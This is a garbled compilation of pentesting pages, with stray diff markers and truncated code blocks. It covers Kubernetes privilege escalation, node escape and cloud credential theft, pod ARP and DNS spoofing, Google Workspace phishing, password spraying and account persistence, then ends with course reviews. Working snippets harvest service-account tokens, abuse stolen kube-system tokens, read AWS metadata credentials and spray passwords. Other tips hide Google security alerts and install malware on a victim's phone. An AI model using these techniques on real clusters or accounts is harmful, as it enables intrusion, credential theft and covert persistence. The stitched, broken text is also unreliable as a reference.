In this example we try to create a role with the `create` and `patch` permissions over the roles resources. However, K8s prevents us from creating a role with more permissions than the principal creating it has:
' | kubectl apply -f -

# Try to create a role over all the resources with "create" and "patch"
# This won't work
echo 'kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:

</details>

# Privileged and hostPID

With these privileges you will have **access to the host's processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
Note that you might not need privileged but just some capabilities and other potential defense bypasses (like apparmor and/or seccomp).
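A quick sanity check (a minimal sketch) tells you whether `hostPID` is actually in effect, and the usual `nsenter` one-liner (shown commented out, since it needs a privileged pod) gets you onto the node:

```bash
# Quick check: with hostPID the container sees the host's process tree,
# so PID 1 is the host init (e.g. systemd), not your container entrypoint.
cat /proc/1/comm

# If the pod is also privileged, entering the namespaces of the host's
# PID 1 typically yields a root shell on the node:
# nsenter --target 1 --mount --uts --ipc --net --pid -- bash
```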
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
```

# Privileged only

</details>

# GCP

If you are running a k8s cluster inside GCP you will probably want some application running inside the cluster to have some access to GCP. There are 2 common ways of doing that:

## Mounting GCP-SA keys as secret

A common way to give **access to a kubernetes application to GCP** is to:
Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials.
{% endhint %}
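A sketch of that hunt from inside a compromised container (a throw-away demo tree is built here so the commands are self-contained; in a real pod you would search the real filesystem instead):

```bash
# Build a fake tree with a planted GCP service-account key for the demo.
demo=$(mktemp -d)
mkdir -p "$demo/var/run/secrets"
printf '{"type":"service_account","private_key":"..."}' > "$demo/var/run/secrets/sa.json"
export GOOGLE_APPLICATION_CREDENTIALS="$demo/var/run/secrets/sa.json"

# The env var GCP SDKs honour:
env | grep -i GOOGLE_APPLICATION_CREDENTIALS

# JSON key files usually contain "type": "service_account" and a private_key:
grep -rl '"type": *"service_account"' "$demo" 2>/dev/null
```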
## GKE Workload Identity

With Workload Identity, we can configure a [Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a [Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
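The link between the two accounts is the `iam.gke.io/gcp-service-account` annotation on the Kubernetes service account; a sketch with placeholder names (the annotation key is real, the account names are hypothetical):

```bash
# Hypothetical KSA annotated to impersonate a GSA via Workload Identity.
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-ksa
  namespace: default
  annotations:
    iam.gke.io/gcp-service-account: app-gsa@my-project.iam.gserviceaccount.com' | kubectl apply -f -
```

As an attacker, this annotation is exactly what the enumeration one-liner in this section greps for.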
done | grep -B 1 "gcp-service-account"
```

# AWS

## Kiam & Kube2IAM (IAM role for Pods) <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>

An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it.
As an attacker, if you **find these annotations** in pods or namespaces, or a kiam/kube2iam server running (probably in kube-system), you can **impersonate every role** that is already **used by pods** and more (if you have access to the AWS account, enumerate the roles).
{% endhint %}

### Create Pod with IAM Role

{% hint style="info" %}
The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
args: ["-c", "sleep 100000"]' | kubectl apply -f -
```

## Workflow of IAM role for Service Accounts via OIDC <a href="#workflow-of-iam-role-for-service-accounts" id="workflow-of-iam-role-for-service-accounts"></a>

This is the recommended way by AWS.
{% endhint %}

## Find Pods and SAs with IAM Roles in the Cluster

This is a script to easily **iterate over all the pods and SAs** definitions **looking** for that **annotation**:
done | grep -B 1 "amazonaws.com"
```

## Node IAM Role

The previous section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node will very likely **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to check each node_).
kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'
```

## Steal IAM Role Token

Previously we have discussed how to **attach IAM Roles to Pods** or even how to **escape to the Node to steal the IAM Role** the instance has attached to it.
fi
```
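Once the credentials JSON has been fetched from the metadata endpoint, it can be turned into usable AWS environment variables; a sketch over a sample response (plain `sed` parsing so it works without `jq` — the key names match the real metadata response, the values are placeholders):

```bash
# Sample of the JSON returned by
# http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
creds='{"AccessKeyId":"ASIAEXAMPLE","SecretAccessKey":"secret","Token":"token"}'

# Extract one string field from a flat JSON blob.
json_field () { printf '%s' "$1" | sed -n "s/.*\"$2\":\"\([^\"]*\)\".*/\1/p"; }

export AWS_ACCESS_KEY_ID=$(json_field "$creds" AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(json_field "$creds" SecretAccessKey)
export AWS_SESSION_TOKEN=$(json_field "$creds" Token)
echo "$AWS_ACCESS_KEY_ID"   # → ASIAEXAMPLE
```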
# References

* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)
* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)

</details>

# Kubernetes Tokens

If you have compromised access to a machine, the user may have access to some Kubernetes platform. The token is usually located in a file pointed to by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
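A sketch of that hunt (a fake home directory is built here so the commands are self-contained; on a real host you would check the user's actual home):

```bash
# Build a fake home dir with a planted kubeconfig for the demo.
home=$(mktemp -d)
mkdir -p "$home/.kube"
printf 'apiVersion: v1\nkind: Config\nusers:\n- name: u\n  user:\n    token: eyJhbGciOi...\n' > "$home/.kube/config"

# Usual places to check:
echo "KUBECONFIG=${KUBECONFIG:-<unset>}"
find "$home/.kube" -type f 2>/dev/null
grep -R "token:" "$home/.kube" 2>/dev/null
```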
If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8s env:

## Service Account Tokens

Before continuing, if you don't know what a service is in Kubernetes I would suggest you [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.**
* /var/lib/localkube/certs

## Hot Pods

_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
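To decide whether a stolen token belongs to a hot pod you can grep the output of `kubectl auth can-i --list` for dangerous verb/resource pairs; a sketch over a sample listing (the pattern list is an illustrative starting point, not exhaustive):

```bash
# Sample output in the shape of `kubectl auth can-i --list`
canilist='Resources   Verbs
secrets     [get list]
pods        [create]
events      [list]'

# Flag permissions commonly abusable for privilege escalation.
printf '%s\n' "$canilist" | grep -E 'secrets|pods.*create|impersonate|clusterroles'
```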
# RBAC

If you don't know what **RBAC** is, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac).

# Enumeration CheatSheet

In order to enumerate a K8s environment you need a couple of things:
However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.

## Differences between `list` and `get` verbs

With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
The following `kubectl` commands indicate just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %}

## Using curl

From inside a pod you can use several env variables:
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
```

## Using kubectl

Having the token and the address of the API server you can use kubectl or curl to access it as indicated here:
To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`

## Current Configuration

{% tabs %}
{% tab title="Kubectl" %}
--auth-provider-arg=id-token=( your id_token )
```

## Get Supported Resources

With this info you will know all the services you can list
{% endtab %}
{% endtabs %}

## Get Current Privileges

{% tabs %}
{% tab title="kubectl" %}
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %}

## Get Others' roles

{% tabs %}
{% tab title="kubectl" %}
{% endtab %}
{% endtabs %}

## Get namespaces

Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
{% endtab %}
{% endtabs %}

## Get secrets

{% tabs %}
{% tab title="kubectl" %}
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
```

## Get Service Accounts

As discussed at the beginning of this page, **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where they are running may allow a user to escalate privileges.
{% endtab %}
{% endtabs %}

## Get Deployments

The deployments specify the **components** that need to be **run**.
{% endtab %}
{% endtabs %}

## Get Pods

The Pods are the actual **containers** that will **run**.
{% endtab %}
{% endtabs %}

## Get Services

Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
{% endtab %}
{% endtabs %}

## Get nodes

Get all the **nodes configured inside the cluster**.
{% endtab %}
{% endtabs %}

## Get DaemonSets

**DaemonSets** allow you to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will also be removed.
{% endtab %}
{% endtabs %}

## Get cronjob

Cron jobs allow scheduling, using crontab-like syntax, the launch of a pod that will perform some action.
{% endtab %}
{% endtabs %}

## Get "all"

{% tabs %}
{% tab title="kubectl" %}
{% endtab %}
{% endtabs %}

## **Get Pods consumptions**

{% tabs %}
{% tab title="kubectl" %}
{% endtab %}
{% endtabs %}

## Escaping from the pod

If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and paths.
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)

# References

{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}

</details>

# Introduction

Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious container to perform an [**ARP spoofing attack**](../../pentesting/pentesting-network/#arp-spoofing) against the containers on the same node and capture their traffic.
kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash"
```

# Basic Kubernetes Networking

If you want more details about the networking topics introduced here, go to the references.

## ARP

Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
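From inside a pod you can inspect the current ARP cache without extra tooling; the kernel exposes it directly, and on a node the entries typically include the bridge and neighbour pods:

```bash
# The ARP cache as seen by this network namespace; inside a pod this
# usually lists the cbr0 gateway and recently contacted neighbour pods.
cat /proc/net/arp
```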
Therefore, it's possible to perform **ARP Spoofing attacks between pods in the same node.**
{% endhint %}

## DNS

In kubernetes environments you will usually find 1 (or more) **DNS services running**, usually in the kube-system namespace:
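A pod's `/etc/resolv.conf` points at the cluster DNS Service IP (often 10.96.0.10); a sketch of extracting it, run here over a sample file so it is self-contained:

```bash
# Sample of a pod's /etc/resolv.conf in a default cluster.
resolv='nameserver 10.96.0.10
search default.svc.cluster.local svc.cluster.local cluster.local
options ndots:5'

# Pull out the DNS Service IP the pod sends its queries to.
printf '%s\n' "$resolv" | awk '/^nameserver/ {print $2}'
```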
Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS requests** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
{% endhint %}

# ARP Spoofing in pods in the same Node

Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**.

## Scapy

```bash
python3 /tmp/arp_spoof.py
```
{% endcode %}

## ARPSpoof

```bash
apt install dsniff
arpspoof -t 172.17.0.9 172.17.0.10
```

# DNS Spoofing

As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**.
You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim sent the DNS request (which is something like 172.16.0.2, not 10.96.0.10; that's the K8s DNS service IP and not the DNS server IP, more about this in the introduction).
{% endhint %}

# References

* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)

</details>

# Namespace Escalation

In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.

Here are some techniques you can try to escalate to a different namespace:

## Abuse K8s privileges

Obviously, if the account you have stolen has sensitive privileges over the namespace you can escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existing pod inside the ns, or reading the **secret** SA tokens.
@ -33,7 +31,7 @@ For more info about which privileges you can abuse read:
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %}

## Escape to the node

If you can escape to the node, either because you have compromised a pod and can escape from it or because you can create a privileged pod and escape, you can do several things to steal other SAs' tokens:
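Once on the node, one of those things is scanning the kubelet's pod directories for mounted service-account tokens. A minimal sketch (assuming the usual kubelet layout under `/var/lib/kubelet/pods`; requires root on the node, and the exact volume directory name can vary between cluster versions):

```python
import glob
import os

def find_sa_tokens(root="/var/lib/kubelet/pods"):
    """Return {path: token} for every service-account token mounted
    into a pod running on this node.
    The kubelet keeps each pod's projected SA token under
    .../volumes/kubernetes.io~projected/*/token (older clusters used
    kubernetes.io~secret); both patterns are scanned."""
    tokens = {}
    patterns = [
        os.path.join(root, "*", "volumes", "kubernetes.io~projected", "*", "token"),
        os.path.join(root, "*", "volumes", "kubernetes.io~secret", "*", "token"),
    ]
    for pattern in patterns:
        for path in glob.glob(pattern):
            try:
                with open(path) as f:
                    tokens[path] = f.read().strip()
            except OSError:
                pass  # unreadable mount, skip it
    return tokens

if __name__ == "__main__":
    for path, token in find_sa_tokens().items():
        print(f"{path}: {token[:40]}...")
```

Each recovered token can then be used against the API server with `kubectl --token=...` to act as that pod's service account.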


@ -17,31 +17,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

# Workspace Phishing

## Generic Phishing Methodology
{% content-ref url="../phishing-methodology/" %}
[phishing-methodology](../phishing-methodology/)
{% endcontent-ref %}

## Google Groups Phishing

Apparently, by default in Workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user, **adding some links.** The **email will come from a Google address**, so it will look **legit** and people might click on the link.

## Hangout Phishing

You might be able to talk directly with a person knowing just their email address, or to send them an invitation to talk. Either way, modify an email account, maybe naming it "Google Security" and adding some Google logos, and people will think they are talking to Google: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s)

The **same technique** can be used with **Google Chat**.

## Google Doc Phishing

You can create an **apparently legitimate document** and then in a comment **mention some email address (like +user@gmail.com)**. Google will **send an email to that address** notifying that they were mentioned in the document. You can **put a link in that document** to try to make the person access it.

## Google Calendar Phishing

You can **create a calendar event** and add as many email addresses of the company you are attacking as you have. Schedule the event **5 or 15 minutes** from the current time. Make the event look legit and **put a comment indicating that they need to read something** (with the **phishing link**).\
To make it look less suspicious:
@ -50,17 +48,17 @@ To make it looks less suspicious:
* Do **NOT send emails notifying about the event**. Then, people will only see the warning about a meeting in 5 minutes and that they need to read that link.
* Apparently, using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.

## OAuth Phishing

Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** some **access** from the user. If the user **trusts** the **source**, they might **trust** the **application** (even if it's asking for highly privileged permissions).

Note that Google presents an ugly warning prompt indicating that the application is untrusted in several cases, and Workspace admins can even prevent people from accepting OAuth applications. More on this in the OAuth section.

# Password Spraying

In order to test passwords with all the emails you found (or that you have generated based on an email name pattern you might have discovered), you can use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing), which uses AWS Lambdas to rotate the source IP address.
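The core spraying loop is simple: try one password against every account before moving to the next, so no single account accumulates failures fast enough to lock out. A sketch, where `try_login` is a placeholder for whatever auth check you plug in (e.g. an IP-rotating Lambda backend like CredKing's):

```python
import time

def password_spray(emails, passwords, try_login, delay=0.0):
    """Spray: iterate passwords in the outer loop and accounts in the
    inner loop, so each account sees at most one attempt per round.
    `try_login(email, password) -> bool` is a hypothetical callback
    standing in for the real authentication attempt.
    Returns the (email, password) pairs that succeeded."""
    hits = []
    for password in passwords:
        for email in emails:
            if try_login(email, password):
                hits.append((email, password))
        time.sleep(delay)  # pause between rounds to stay under lockout thresholds
    return hits
```

Usage: `password_spray(found_emails, ["Winter2022!"], my_check, delay=1800)` tries one candidate password per half hour across the whole user list.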
# OAuth Apps

**Google** allows creating applications that can **interact on behalf of users** with several **Google services**: Gmail, Drive, GCP...
@ -69,7 +67,7 @@ When a **user** wants to **use** that **application**, he will be **prompted** t
This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information**, because they might not understand the consequences. Therefore, in organization accounts there are ways to prevent this from happening.

## Unverified App prompt

As mentioned, Google will always present a **prompt to the user to accept** the permissions they are granting the application on their behalf. However, if the application is considered **dangerous**, Google will **first** show a **prompt** indicating that it's **dangerous**, **making it more difficult** for the user to grant the permissions to the app.
@ -78,14 +76,14 @@ This prompt appears in apps that:
* Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
* Have fewer than 100 users (for apps with more than 100 users a review process is also needed to stop showing the unverified prompt)

## Interesting Scopes

You can [**find here**](https://developers.google.com/identity/protocols/oauth2/scopes) a list of all the Google OAuth scopes.

* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
* **directory.readonly**: See and download your organization's GSuite directory. Get names, phone numbers and calendar URLs of all the users.
# App Scripts

Developers can create App Scripts and set them up as a standalone project or bind them to Google Docs/Sheets/Slides/Forms. An App Script is code that will be triggered when a user with editor permission accesses the doc (after accepting the OAuth prompt).
@ -94,7 +92,7 @@ However, even if the app isn't verified there are a couple of ways to not show t
* If the publisher of the app is in the same Workspace as the user accessing it
* If the script is in a drive of the user

## Copy Document Unverified Prompt Bypass

When you create a link to share a document, a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
If you **change** the ending **"/edit"** to **"/copy"**, instead of opening the document Google will ask whether you want to **generate a copy of the document.**
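The transformation is just a suffix swap on the share URL; a small sketch (assuming links of the usual `.../d/<id>/edit` shape, possibly with query parameters to strip first):

```python
def to_copy_link(share_url: str) -> str:
    """Turn a Google Docs share link ending in /edit into the /copy
    variant that prompts the visitor to clone the document."""
    base = share_url.split("?")[0].rstrip("/")  # drop query string and trailing slash
    if base.endswith("/edit"):
        return base[: -len("edit")] + "copy"
    return base + "/copy"
```

For example, `to_copy_link("https://docs.google.com/spreadsheets/d/1i5xyz/edit")` yields the `/copy` form of the same link.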
@ -111,7 +109,7 @@ But can be prevented with:
![](<../.gitbook/assets/image (632).png>)

## Shared Document Unverified Prompt Bypass

Moreover, if someone **shared** a document with you with **editor access**, you can generate **App Scripts inside the document**, and the **OWNER (creator) of the document will be the owner of the App Script**.
@ -126,45 +124,45 @@ This also means that if an **App Script already existed** and people has **grant
To abuse this you also need people to trigger the App Script. One neat trick is to **publish the script as a web app**: when the **people** who already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `<img>` tags).
{% endhint %}

# Post-Exploitation

## Google Groups Privesc

By default in Workspace a **group** can be **freely accessed** by any member of the organization.\
Workspace also allows **granting permissions to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**.

You potentially need access to the console to join groups that can be joined by anyone in the org. Check group information at [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
## Privesc to GCP Summary

* Abusing the **Google Groups privesc** you might be able to escalate to a group with some kind of privileged access to GCP
* Abusing **OAuth applications** you might be able to impersonate users and access GCP on their behalf

## Access Groups Mail info

If you managed to **compromise a Google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is a member of, and you might find **credentials** or other **sensitive data**.

## Takeout - Download Everything Google Knows about an account

If you have a **session inside the victim's Google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)

## Vault - Download all the Workspace data of users

If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**.

## Contacts download

From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user.

## Cloudsearch

In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **quickly find sensitive information**.

## Currents

In [**https://currents.google.com/**](https://currents.google.com) you can access Google **Chat**, so you might find sensitive information there.

## Google Drive Mining

When **sharing** a document you can **specify** the **people** who can access it one by one, or **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**.
@ -177,28 +175,28 @@ Some proposed ways to find all the documents:
* Search in internal chat, forums...
* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with [**PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)

## **Keep Notes**

In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user; **sensitive** **information** might be saved here.

## Persistence inside a Google account

If you managed to **compromise a Google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) and **regenerate the 2FA backup codes**, so that even if the user changes the password you **will still be able to access the account**. Another option, **instead** of **regenerating** the codes, is to **enrol your own authenticator** app in the 2FA.

## Persistence via OAuth Apps

If you have **compromised the account of a user,** you can just **accept** granting all the possible permissions to an **OAuth App**. The only problem is that Workspace can be configured to **disallow external and/or internal OAuth apps** that haven't been reviewed.\
It is pretty common not to trust external OAuth apps by default but to trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**.

## Persistence via delegation

You can just **delegate the account** to a different account controlled by the attacker.

## Persistence via Android App

If you have a **session inside the victim's Google account** you can browse to the **Play Store** and **install malware** you have already uploaded to the store directly **on the phone** to maintain persistence and access the victim's phone.

## **Persistence via Gmail**

* You can create **filters to hide** security notifications from Google
  * from: (no-reply@accounts.google.com) "Security Alert"
@ -207,19 +205,19 @@ If you have a **session inside victims google account** you can browse to the **
* Create a forwarding address to send emails that contain the word "password", for example
* Add a **recovery email/phone under the attacker's control**

## **Persistence via** App Scripts

You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**.

The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently that's not necessary** as long as you have declared some other scope.

## **Administrate Workspace**

In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization.

You can also search emails through all the users' mailboxes in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
# Account Compromised Recovery

* Log out of all sessions
* Change user password
@ -233,7 +231,7 @@ You can also search emails through all the users invoices in [**https://admin.go
* Remove bad Android Apps
* Remove bad account delegations

# References

* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?


@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

# eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses

## Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)

This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as an OS, how **applications work**, the **most sensitive components** of Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in real life**.
@ -30,7 +28,7 @@ I found the course to be a great one for **people that don't have any experience
Finally, note **two more things** about this course: it has **great labs to practice** what you learn; however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue, as **it teaches you the basics to be able to understand other Android vulnerabilities**.\
Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks.

## Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)

When I took this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to take the course don't miss the opportunity.** As with the previous course, this course will teach you the **basics of iOS**, how **iOS** **applications work**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\
However, there is a very important difference with the Android course: if you want to follow the labs, I would recommend you **get a jailbroken iOS device or pay for some good iOS emulator.**
@ -38,7 +36,7 @@ However, there is a very important difference with the Android course, if you wa
As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue, as **it teaches you the basics to be able to understand other iOS vulnerabilities**.\
Besides, once you have completed the course (or before) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-apps-pentesting/ios-pentesting/) and learn more tricks.

## [eMAPT](https://elearnsecurity.com/product/emapt-certification/)

> The eLearnSecurity Mobile Application Penetration Tester (eMAPT) certification is issued to cyber security experts that display advanced mobile application security knowledge through a scenario-based exam.
@ -50,16 +48,16 @@ Having done the [**INE course about Android applications pentesting**](https://m
In this exam I **missed the opportunity to exploit more vulnerabilities**; however, **I lost a bit of the "fear" of writing Android applications to exploit a vulnerability**. So it felt just like **another part of the course to complete your knowledge in Android application pentesting**.

# eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the related INE course

## Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)

This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \
Even having worked as a web pentester for several years before taking the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.

I think this course **isn't for web hacking beginners** (there are other INE courses for that, like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, if you aren't a beginner, regardless of the web hacking "level" you think you have, **I definitely recommend you take a look at the course**, because I'm sure you **will learn new things**, like I did.

## [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)

> The eLearnSecurity Web Application Penetration Tester eXtreme (eWAPTX) is our most advanced web application pentesting certification. The eWPTX exam requires students to perform an expert-level penetration test that is then assessed by INE's cyber security instructors. Students are expected to provide a complete report of their findings, as they would in the corporate sector, in order to pass.
@@ -68,24 +66,24 @@ The exam was composed of a **few web applications full of vulnerabilities**. In

**All the vulnerabilities I reported could be found explained in the** [**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**.** However, in order to pass this exam I think that you **don't only need to know about web vulnerabilities**, you also need to be **experienced in exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platforms where you can improve your skills at exploiting web vulnerabilities.
# Course: **Data Science on the Google Cloud Platform**

It's a very interesting basic course about **how to use the ML environment provided by Google** using services such as BigQuery (to store and load results), Google Deep Learning APIs (Google Vision API, Google Speech API, Google Natural Language API and Google Video Intelligence API) and even how to train your own model.
# Course: **Machine Learning with scikit-learn Starter Pass**

In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**.

It's definitely recommended for people who haven't used scikit-learn (but know Python).
# **Course: Classification Algorithms**

The [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) is a great course for people who are **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.

It also shows how to **create models** with **scikit-learn.**

# Course: **Decision Trees**

The [**Decision Trees course**](https://my.ine.com/DataScience/courses/83fcfd52/decision-trees) was very useful to improve my knowledge about **Decision and Regression Trees**, **when** they are **useful**, **how** they **work** and how to properly **tune them**.
@@ -93,7 +91,7 @@ It also explains **how to create tree models** with scikit-learn different techn

